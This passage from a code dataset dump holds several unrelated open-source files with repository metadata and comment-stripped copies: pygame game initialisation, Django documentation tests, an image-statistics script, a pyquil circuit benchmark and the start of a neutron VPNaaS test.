WriteLog.debug(__name__, "初始化帮助图层完成")
Shop1 = ui.Shop1(mode='copy', surface=RootScreen)
Shop1.priority = 140
RootScreen.add_child(Shop1)
global_var.set_value("Shop1", Shop1)
WriteLog.debug(__name__, "初始化商店1图层完成")
Shop2 = ui.Shop2(mode='copy', surface=RootScreen)
Shop2.priority = 140
RootScreen.add_child(Shop2)
global_var.set_value("Shop2", Shop2)
WriteLog.debug(__name__, "初始化商店2图层完成")
TEXTBOX = ui.TextBox(mode='copy', surface=RootScreen)
TEXTBOX.priority = 140
RootScreen.add_child(TEXTBOX)
global_var.set_value("TEXTBOX", TEXTBOX)
WriteLog.debug(__name__, "初始化文本框图层完成")
CHOICEBOX = ui.ChoiceBox(mode='copy', surface=RootScreen)
CHOICEBOX.priority = 140
RootScreen.add_child(CHOICEBOX)
global_var.set_value("CHOICEBOX", CHOICEBOX)
WriteLog.debug(__name__, "初始化选择框图层完成")
SHOWDAMAGE = ui.ShowDamage(mode='copy', surface=RootScreen)
SHOWDAMAGE.priority = 65
RootScreen.add_child(SHOWDAMAGE)
global_var.set_value("SHOWDAMAGE", SHOWDAMAGE)
WriteLog.debug(__name__, "初始化显伤层完成")
CURTAIN = ui.Curtain(mode='copy', surface=RootScreen)
CURTAIN.priority = 125
RootScreen.add_child(CURTAIN)
global_var.set_value("CURTAIN", CURTAIN)
WriteLog.debug(__name__, "初始化色调层完成")
WriteLog.info(__name__, "初始化全部UI图层完成")
def init_actions():
def quit(e):
global running
running = False
return True
action_control.register_action('QUIT', pygame.QUIT, quit)
action_control.register_action('BOOK', pygame.KEYUP, global_var.get_value('BOOK').action)
action_control.register_action('STARTMENU', pygame.KEYUP, global_var.get_value('STARTMENU').action)
action_control.register_action('BACKPACK', pygame.KEYUP, global_var.get_value('BACKPACK').action)
action_control.register_action('SAVE', pygame.KEYUP, global_var.get_value('SAVE').action)
action_control.register_action('LOAD', pygame.KEYUP, global_var.get_value('LOAD').action)
action_control.register_action('FLY', pygame.KEYUP, global_var.get_value('FLY').action)
action_control.register_action('HELP', pygame.KEYUP, global_var.get_value('HELP').action)
action_control.register_action('Shop1', pygame.KEYUP, global_var.get_value('Shop1').action)
action_control.register_action('Shop2', pygame.KEYUP, global_var.get_value('Shop2').action)
action_control.register_action('TEXTBOX', pygame.KEYUP, global_var.get_value('TEXTBOX').action)
action_control.register_action('CHOICEBOX', pygame.KEYUP, global_var.get_value('CHOICEBOX').action)
action_control.register_action('SHOWDAMAGE', pygame.KEYUP, global_var.get_value('SHOWDAMAGE').action)
action_control.register_action('STATUSBAR', pygame.KEYUP, global_var.get_value('STATUSBAR').action)
action_control.register_action('CURTAIN', pygame.KEYUP, global_var.get_value('CURTAIN').action)
WriteLog.info(__name__, "事件全部注册完成")
def init_sound():
Music = music.MusicWrapper()
global_var.set_value("Music", Music)
WriteLog.info(__name__, "初始化音效完成")
def init_event_flow():
EVENTFLOW = EventFlow()
global_var.set_value("EVENTFLOW", EVENTFLOW)
EVENT = Event()
global_var.set_value("EVENT", EVENT)
EVENT.get_event_flow_module()
EVENTFLOW.get_event_module()
WriteLog.info(__name__, "初始化事件流完成")
def init_function():
FUNCTION = global_var.get_value("FUNCTION")
FUNCTION.init_var()
WriteLog.info(__name__, "初始化function完成")
if DEBUG:
import threading
def console():
while running:
r = input()
try:
print(eval(r))
except:
try:
exec(r)
except Exception as e:
print("error:", str(e))
t = threading.Thread(target=console)
t.start()
init()
init_actions()
init_sound()
init_event_flow()
init_function()
clock = pygame.time.Clock()
STARTMENU = global_var.get_value("STARTMENU")
while running:
if STARTMENU.new_game == True:
STARTMENU.open()
STARTMENU.new_game = False
show_damage = global_var.get_value("SHOWDAMAGE")
show_damage.open()
status_bar = global_var.get_value("STATUSBAR")
status_bar.open()
CurrentMap.active = True
EVENTFLOW = global_var.get_value("EVENTFLOW")
with open(os.path.join(os.getcwd(),"project", "start_text.json")) as f:
start_text = json.load(f)
EVENTFLOW.insert_action(start_text["startText"])
pygame.display.update()
RootScreen.flush(screen)
action_control.action_render()
| true
| true
|
f70b6058884bd02f5b51d29c0313f747701475ac
| 11,761
|
py
|
Python
|
docs/tests.py
|
dineshsonachalam/djangoproject.com
|
4fff6b48be275f97b060ce05de0e55e453a1b5f9
|
[
"BSD-3-Clause"
] | null | null | null |
docs/tests.py
|
dineshsonachalam/djangoproject.com
|
4fff6b48be275f97b060ce05de0e55e453a1b5f9
|
[
"BSD-3-Clause"
] | null | null | null |
docs/tests.py
|
dineshsonachalam/djangoproject.com
|
4fff6b48be275f97b060ce05de0e55e453a1b5f9
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
import os
from http import HTTPStatus
from operator import attrgetter
from pathlib import Path
from django.conf import settings
from django.contrib.sites.models import Site
from django.template import Context, Template
from django.test import TestCase
from django.urls import reverse, set_urlconf
from djangoproject.urls import www as www_urls
from releases.models import Release
from .models import Document, DocumentRelease
from .sitemaps import DocsSitemap
from .utils import get_doc_path
class ModelsTests(TestCase):
def test_dev_is_supported(self):
"""
Document for a release without a date ("dev") is supported.
"""
d = DocumentRelease.objects.create()
self.assertTrue(d.is_supported)
self.assertTrue(d.is_dev)
def test_current_is_supported(self):
"""
Document with a release without an EOL date is supported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_previous_is_supported(self):
"""
Document with a release with an EOL date in the future is supported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day,
eol_date=today + 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_old_is_unsupported(self):
"""
Document with a release with an EOL date in the past is insupported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day,
eol_date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertFalse(d.is_supported)
self.assertFalse(d.is_dev)
def test_most_recent_micro_release_considered(self):
"""
Dates are looked up on the latest micro release in a given series.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day)
d = DocumentRelease.objects.create(release=r)
r2 = Release.objects.create(version='1.8.1',
date=today - 5 * day)
# The EOL date of the first release is set automatically.
r.refresh_from_db()
self.assertEqual(r.eol_date, r2.date)
# Since 1.8.1 is still supported, docs show up as supported.
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
class ManagerTests(TestCase):
@classmethod
def setUpTestData(cls):
r1 = Release.objects.create(version='1.0')
r2 = Release.objects.create(version='2.0')
DocumentRelease.objects.bulk_create(
DocumentRelease(lang=lang, release=release)
for lang, release in [('en', r1), ('en', r2), ('sv', r1), ('ar', r1)]
)
def test_by_version(self):
doc_releases = DocumentRelease.objects.by_version('1.0')
self.assertEqual(
{(r.lang, r.release.version) for r in doc_releases},
{('en', '1.0'), ('sv', '1.0'), ('ar', '1.0')}
)
def test_get_by_version_and_lang_exists(self):
doc = DocumentRelease.objects.get_by_version_and_lang('1.0', 'en')
self.assertEqual(doc.release.version, '1.0')
self.assertEqual(doc.lang, 'en')
def test_get_by_version_and_lang_missing(self):
with self.assertRaises(DocumentRelease.DoesNotExist):
DocumentRelease.objects.get_by_version_and_lang('2.0', 'sv')
def test_get_available_languages_by_version(self):
get = DocumentRelease.objects.get_available_languages_by_version
self.assertEqual(list(get('1.0')), ['ar', 'en', 'sv'])
self.assertEqual(list(get('2.0')), ['en'])
self.assertEqual(list(get('3.0')), [])
class RedirectsTests(TestCase):
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_team_url(self):
# This URL is linked from the docs.
self.assertEqual('/foundation/teams/', reverse('members:teams', urlconf=www_urls))
def test_internals_team(self):
response = self.client.get(
'/en/dev/internals/team/',
HTTP_HOST='docs.djangoproject.dev:8000',
)
self.assertRedirects(
response,
'https://www.djangoproject.com/foundation/teams/',
status_code=HTTPStatus.MOVED_PERMANENTLY,
fetch_redirect_response=False,
)
class SearchFormTestCase(TestCase):
fixtures = ['doc_test_fixtures']
def setUp(self):
# We need to create an extra Site because docs have SITE_ID=2
Site.objects.create(name='Django test', domain="example2.com")
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_empty_get(self):
response = self.client.get('/en/dev/search/',
HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 200)
class TemplateTagTests(TestCase):
def test_pygments_template_tag(self):
template = Template('''
{% load docs %}
{% pygment 'python' %}
def band_listing(request):
"""A view of all bands."""
bands = models.Band.objects.all()
return render(request, 'bands/band_listing.html', {'bands': bands})
{% endpygment %}
''')
self.assertHTMLEqual(
template.render(Context()),
"""
<div class="highlight">
<pre>
<span></span>
<span class="k">def</span><span class="nf">band_listing</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">):</span>
<span class="sd">"""A view of all bands."""</span>
<span class="n">bands</span> <span class="o">=</span>
<span class="n">models</span><span class="o">.</span>
<span class="n">Band</span><span class="o">.</span>
<span class="n">objects</span><span class="o">.</span>
<span class="n">all</span><span class="p">()</span>
<span class="k">return</span> <span class="n">render</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">,</span>
<span class="s1">'bands/band_listing.html'</span>
<span class="p">,</span> <span class="p">{</span>
<span class="s1">'bands'</span><span class="p">:</span>
<span class="n">bands</span><span class="p">})</span>
</pre>
</div>
"""
)
class TestUtils(TestCase):
def test_get_doc_path(self):
# non-existent file
self.assertEqual(get_doc_path(Path('root'), 'subpath.txt'), None)
# existing file
path, filename = __file__.rsplit(os.path.sep, 1)
self.assertEqual(get_doc_path(Path(path), filename), None)
class UpdateDocTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.release = DocumentRelease.objects.create()
def test_sync_to_db(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_clean_path(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar/index',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_title_strip_tags(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the <strong>title</strong>',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['This is the title'], transform=attrgetter('title'))
def test_title_entities(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'Title & title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['Title & title'], transform=attrgetter('title'))
def test_empty_documents(self):
self.release.sync_to_db([
{'title': 'Empty body document', 'current_page_name': 'foo/1'},
{'body': 'Empty title document', 'current_page_name': 'foo/2'},
{'current_page_name': 'foo/3'},
])
self.assertQuerysetEqual(self.release.documents.all(), [])
def test_excluded_documents(self):
"""
Documents aren't created for partially translated documents excluded
from robots indexing.
"""
# Read the first Disallow line of robots.txt.
robots_path = settings.BASE_DIR.joinpath('djangoproject', 'static', 'robots.docs.txt')
with open(str(robots_path), 'r') as fh:
for line in fh:
if line.startswith("Disallow:"):
break
_, lang, version, path = line.strip().split('/')
release = DocumentRelease.objects.create(
lang=lang, release=Release.objects.create(version=version),
)
release.sync_to_db([
{'body': '', 'title': '', 'current_page_name': 'nonexcluded/bar'},
{'body': '', 'title': '', 'current_page_name': '%s/bar' % path},
])
self.assertQuerysetEqual(
release.documents.all(),
['<Document: %s/%s/nonexcluded/bar>' % (lang, version)]
)
class SitemapTests(TestCase):
fixtures = ['doc_test_fixtures']
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_sitemap_index(self):
response = self.client.get('/sitemap.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertContains(response, '<sitemap>', count=2)
self.assertContains(response, '<loc>http://docs.djangoproject.dev:8000/sitemap-en.xml</loc>')
def test_sitemap(self):
doc_release = DocumentRelease.objects.create()
document = Document.objects.create(release=doc_release)
sitemap = DocsSitemap('en')
urls = sitemap.get_urls()
self.assertEqual(len(urls), 1)
url_info = urls[0]
self.assertEqual(url_info['location'], document.get_absolute_url())
def test_sitemap_404(self):
response = self.client.get('/sitemap-xx.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 404)
self.assertEqual(
response.context['exception'],
"No sitemap available for section: 'xx'"
)
| 36.299383
| 116
| 0.590426
|
import datetime
import os
from http import HTTPStatus
from operator import attrgetter
from pathlib import Path
from django.conf import settings
from django.contrib.sites.models import Site
from django.template import Context, Template
from django.test import TestCase
from django.urls import reverse, set_urlconf
from djangoproject.urls import www as www_urls
from releases.models import Release
from .models import Document, DocumentRelease
from .sitemaps import DocsSitemap
from .utils import get_doc_path
class ModelsTests(TestCase):
def test_dev_is_supported(self):
d = DocumentRelease.objects.create()
self.assertTrue(d.is_supported)
self.assertTrue(d.is_dev)
def test_current_is_supported(self):
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_previous_is_supported(self):
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day,
eol_date=today + 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_old_is_unsupported(self):
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day,
eol_date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertFalse(d.is_supported)
self.assertFalse(d.is_dev)
def test_most_recent_micro_release_considered(self):
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day)
d = DocumentRelease.objects.create(release=r)
r2 = Release.objects.create(version='1.8.1',
date=today - 5 * day)
r.refresh_from_db()
self.assertEqual(r.eol_date, r2.date)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
class ManagerTests(TestCase):
@classmethod
def setUpTestData(cls):
r1 = Release.objects.create(version='1.0')
r2 = Release.objects.create(version='2.0')
DocumentRelease.objects.bulk_create(
DocumentRelease(lang=lang, release=release)
for lang, release in [('en', r1), ('en', r2), ('sv', r1), ('ar', r1)]
)
def test_by_version(self):
doc_releases = DocumentRelease.objects.by_version('1.0')
self.assertEqual(
{(r.lang, r.release.version) for r in doc_releases},
{('en', '1.0'), ('sv', '1.0'), ('ar', '1.0')}
)
def test_get_by_version_and_lang_exists(self):
doc = DocumentRelease.objects.get_by_version_and_lang('1.0', 'en')
self.assertEqual(doc.release.version, '1.0')
self.assertEqual(doc.lang, 'en')
def test_get_by_version_and_lang_missing(self):
with self.assertRaises(DocumentRelease.DoesNotExist):
DocumentRelease.objects.get_by_version_and_lang('2.0', 'sv')
def test_get_available_languages_by_version(self):
get = DocumentRelease.objects.get_available_languages_by_version
self.assertEqual(list(get('1.0')), ['ar', 'en', 'sv'])
self.assertEqual(list(get('2.0')), ['en'])
self.assertEqual(list(get('3.0')), [])
class RedirectsTests(TestCase):
@classmethod
def tearDownClass(cls):
set_urlconf(None)
super().tearDownClass()
def test_team_url(self):
self.assertEqual('/foundation/teams/', reverse('members:teams', urlconf=www_urls))
def test_internals_team(self):
response = self.client.get(
'/en/dev/internals/team/',
HTTP_HOST='docs.djangoproject.dev:8000',
)
self.assertRedirects(
response,
'https://www.djangoproject.com/foundation/teams/',
status_code=HTTPStatus.MOVED_PERMANENTLY,
fetch_redirect_response=False,
)
class SearchFormTestCase(TestCase):
fixtures = ['doc_test_fixtures']
def setUp(self):
Site.objects.create(name='Django test', domain="example2.com")
@classmethod
def tearDownClass(cls):
set_urlconf(None)
super().tearDownClass()
def test_empty_get(self):
response = self.client.get('/en/dev/search/',
HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 200)
class TemplateTagTests(TestCase):
def test_pygments_template_tag(self):
template = Template('''
{% load docs %}
{% pygment 'python' %}
def band_listing(request):
"""A view of all bands."""
bands = models.Band.objects.all()
return render(request, 'bands/band_listing.html', {'bands': bands})
{% endpygment %}
''')
self.assertHTMLEqual(
template.render(Context()),
"""
<div class="highlight">
<pre>
<span></span>
<span class="k">def</span><span class="nf">band_listing</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">):</span>
<span class="sd">"""A view of all bands."""</span>
<span class="n">bands</span> <span class="o">=</span>
<span class="n">models</span><span class="o">.</span>
<span class="n">Band</span><span class="o">.</span>
<span class="n">objects</span><span class="o">.</span>
<span class="n">all</span><span class="p">()</span>
<span class="k">return</span> <span class="n">render</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">,</span>
<span class="s1">'bands/band_listing.html'</span>
<span class="p">,</span> <span class="p">{</span>
<span class="s1">'bands'</span><span class="p">:</span>
<span class="n">bands</span><span class="p">})</span>
</pre>
</div>
"""
)
class TestUtils(TestCase):
def test_get_doc_path(self):
self.assertEqual(get_doc_path(Path('root'), 'subpath.txt'), None)
path, filename = __file__.rsplit(os.path.sep, 1)
self.assertEqual(get_doc_path(Path(path), filename), None)
class UpdateDocTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.release = DocumentRelease.objects.create()
def test_sync_to_db(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_clean_path(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar/index',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_title_strip_tags(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the <strong>title</strong>',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['This is the title'], transform=attrgetter('title'))
def test_title_entities(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'Title & title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['Title & title'], transform=attrgetter('title'))
def test_empty_documents(self):
self.release.sync_to_db([
{'title': 'Empty body document', 'current_page_name': 'foo/1'},
{'body': 'Empty title document', 'current_page_name': 'foo/2'},
{'current_page_name': 'foo/3'},
])
self.assertQuerysetEqual(self.release.documents.all(), [])
def test_excluded_documents(self):
robots_path = settings.BASE_DIR.joinpath('djangoproject', 'static', 'robots.docs.txt')
with open(str(robots_path), 'r') as fh:
for line in fh:
if line.startswith("Disallow:"):
break
_, lang, version, path = line.strip().split('/')
release = DocumentRelease.objects.create(
lang=lang, release=Release.objects.create(version=version),
)
release.sync_to_db([
{'body': '', 'title': '', 'current_page_name': 'nonexcluded/bar'},
{'body': '', 'title': '', 'current_page_name': '%s/bar' % path},
])
self.assertQuerysetEqual(
release.documents.all(),
['<Document: %s/%s/nonexcluded/bar>' % (lang, version)]
)
class SitemapTests(TestCase):
fixtures = ['doc_test_fixtures']
@classmethod
def tearDownClass(cls):
set_urlconf(None)
super().tearDownClass()
def test_sitemap_index(self):
response = self.client.get('/sitemap.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertContains(response, '<sitemap>', count=2)
self.assertContains(response, '<loc>http://docs.djangoproject.dev:8000/sitemap-en.xml</loc>')
def test_sitemap(self):
doc_release = DocumentRelease.objects.create()
document = Document.objects.create(release=doc_release)
sitemap = DocsSitemap('en')
urls = sitemap.get_urls()
self.assertEqual(len(urls), 1)
url_info = urls[0]
self.assertEqual(url_info['location'], document.get_absolute_url())
def test_sitemap_404(self):
response = self.client.get('/sitemap-xx.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 404)
self.assertEqual(
response.context['exception'],
"No sitemap available for section: 'xx'"
)
| true
| true
|
f70b61cb8859600b367959872158a264f1e91bc4
| 1,215
|
py
|
Python
|
data/cal_mean_std.py
|
PaulTHong/STDA-inf
|
3d87a7843f879d17a343ba4838caa1f58f1e8e65
|
[
"MIT"
] | 1
|
2022-02-21T04:44:09.000Z
|
2022-02-21T04:44:09.000Z
|
data/cal_mean_std.py
|
PaulTHong/STDA-inf
|
3d87a7843f879d17a343ba4838caa1f58f1e8e65
|
[
"MIT"
] | null | null | null |
data/cal_mean_std.py
|
PaulTHong/STDA-inf
|
3d87a7843f879d17a343ba4838caa1f58f1e8e65
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2
import os
mean = []
std = []
img_list = []
dir_path = './STL10-data/train'
class_paths = os.listdir(dir_path)
print(class_paths)
for cls in class_paths:
img_paths = os.listdir(dir_path + os.sep + cls)
print(len(img_paths))
for img_path in img_paths:
print(img_path)
img_path = dir_path + os.sep + cls + os.sep + img_path
img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
img = img[::, np.newaxis]
img_list.append(img)
# dir_path = './STL10-data/test'
# class_paths = os.listdir(dir_path)
# print(class_paths)
# for cls in class_paths:
# img_paths = os.listdir(dir_path + os.sep + cls)
# print(len(img_paths))
# for img_path in img_paths:
# print(img_path)
# img_path = dir_path + os.sep + cls + os.sep + img_path
# img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
# img = img[::, np.newaxis]
# img_list.append(img)
imgs = np.concatenate(img_list, axis=3)
imgs = imgs.astype(np.float32) / 255.0
for i in range(3):
channel = imgs[:, :, i, :].ravel()
mean.append(np.mean(channel))
std.append(np.std(channel))
mean.reverse()
std.reverse()
print(mean)
print(std)
| 22.924528
| 64
| 0.635391
|
import numpy as np
import cv2
import os
mean = []
std = []
img_list = []
dir_path = './STL10-data/train'
class_paths = os.listdir(dir_path)
print(class_paths)
for cls in class_paths:
img_paths = os.listdir(dir_path + os.sep + cls)
print(len(img_paths))
for img_path in img_paths:
print(img_path)
img_path = dir_path + os.sep + cls + os.sep + img_path
img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
img = img[::, np.newaxis]
img_list.append(img)
imgs = np.concatenate(img_list, axis=3)
imgs = imgs.astype(np.float32) / 255.0
for i in range(3):
channel = imgs[:, :, i, :].ravel()
mean.append(np.mean(channel))
std.append(np.std(channel))
mean.reverse()
std.reverse()
print(mean)
print(std)
| true
| true
|
f70b63460b6e1920a8ab199d2d897323b063d66c
| 1,676
|
py
|
Python
|
benchmark/startPyquil1973.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startPyquil1973.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startPyquil1973.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=4
# total number=31
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += X(3) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += H(0) # number=5
prog += H(1) # number=6
prog += H(2) # number=7
prog += H(3) # number=8
prog += Y(1) # number=19
prog += H(0) # number=9
prog += Y(2) # number=10
prog += Y(2) # number=11
prog += Y(3) # number=20
prog += Y(1) # number=12
prog += RX(-2.158274153016188,3) # number=24
prog += H(0) # number=16
prog += CZ(2,0) # number=17
prog += H(0) # number=18
prog += CNOT(1,0) # number=21
prog += Z(1) # number=22
prog += H(0) # number=28
prog += CZ(1,0) # number=29
prog += H(0) # number=30
prog += H(0) # number=25
prog += CZ(2,0) # number=26
prog += H(0) # number=27
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil1973.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| 24.647059
| 64
| 0.569212
|
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program()
prog += X(3)
prog += H(1)
prog += H(2)
prog += H(3)
prog += H(0)
prog += H(1)
prog += H(2)
prog += H(3)
prog += Y(1)
prog += H(0)
prog += Y(2)
prog += Y(2)
prog += Y(3)
prog += Y(1)
prog += RX(-2.158274153016188,3)
prog += H(0)
prog += CZ(2,0)
prog += H(0)
prog += CNOT(1,0)
prog += Z(1)
prog += H(0)
prog += CZ(1,0)
prog += H(0)
prog += H(0)
prog += CZ(2,0)
prog += H(0)
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil1973.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| true
| true
|
f70b6484fd5c367040bd21c68df6b4ceaf51dcfa
| 42
|
py
|
Python
|
libpysal/io/geotable/__init__.py
|
Kanahiro/dbf-df-translator
|
6603ca1ac306203bf8c95e6545685c509324a438
|
[
"MIT"
] | null | null | null |
libpysal/io/geotable/__init__.py
|
Kanahiro/dbf-df-translator
|
6603ca1ac306203bf8c95e6545685c509324a438
|
[
"MIT"
] | null | null | null |
libpysal/io/geotable/__init__.py
|
Kanahiro/dbf-df-translator
|
6603ca1ac306203bf8c95e6545685c509324a438
|
[
"MIT"
] | null | null | null |
from .file import read_files, write_files
| 21
| 41
| 0.833333
|
from .file import read_files, write_files
| true
| true
|
f70b6582958899d7a3048c74fd9764f38a1ce5a8
| 7,444
|
py
|
Python
|
neutron_vpnaas/tests.skip/unit/services/vpn/test_vpnaas_driver_plugin.py
|
citrix-openstack-build/neutron-vpnaas
|
d1ee6923425eca52f400a2de23d1541f16568c2b
|
[
"Apache-2.0"
] | null | null | null |
neutron_vpnaas/tests.skip/unit/services/vpn/test_vpnaas_driver_plugin.py
|
citrix-openstack-build/neutron-vpnaas
|
d1ee6923425eca52f400a2de23d1541f16568c2b
|
[
"Apache-2.0"
] | null | null | null |
neutron_vpnaas/tests.skip/unit/services/vpn/test_vpnaas_driver_plugin.py
|
citrix-openstack-build/neutron-vpnaas
|
d1ee6923425eca52f400a2de23d1541f16568c2b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2013, Nachi Ueno, NTT I3, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
from neutron.common import constants
from neutron import context
from neutron import manager
from neutron.plugins.common import constants as p_constants
from neutron.tests.unit.db.vpn import test_db_vpnaas
from neutron.tests.unit.openvswitch import test_agent_scheduler
from neutron.tests.unit import test_agent_ext_plugin
from neutron_vpnaas.db.vpn import vpn_validator
from neutron_vpnaas.services.vpn.service_drivers import ipsec as ipsec_driver
FAKE_HOST = test_agent_ext_plugin.L3_HOSTA
VPN_DRIVER_CLASS = 'neutron.services.vpn.plugin.VPNDriverPlugin'
class TestVPNDriverPlugin(test_db_vpnaas.TestVpnaas,
test_agent_scheduler.AgentSchedulerTestMixIn,
test_agent_ext_plugin.AgentDBTestMixIn):
def setUp(self):
self.adminContext = context.get_admin_context()
driver_cls_p = mock.patch(
'neutron.services.vpn.'
'service_drivers.ipsec.IPsecVPNDriver')
driver_cls = driver_cls_p.start()
self.driver = mock.Mock()
self.driver.service_type = ipsec_driver.IPSEC
self.driver.validator = vpn_validator.VpnReferenceValidator()
driver_cls.return_value = self.driver
super(TestVPNDriverPlugin, self).setUp(
vpnaas_plugin=VPN_DRIVER_CLASS)
def test_create_ipsec_site_connection(self, **extras):
super(TestVPNDriverPlugin, self).test_create_ipsec_site_connection()
self.driver.create_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
self.driver.delete_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
def test_delete_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_delete_vpnservice()
self.driver.delete_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY)
def test_update_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_update_vpnservice()
self.driver.update_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY)
@contextlib.contextmanager
def vpnservice_set(self):
"""Test case to create a ipsec_site_connection."""
vpnservice_name = "vpn1"
ipsec_site_connection_name = "ipsec_site_connection"
ikename = "ikepolicy1"
ipsecname = "ipsecpolicy1"
description = "my-vpn-connection"
keys = {'name': vpnservice_name,
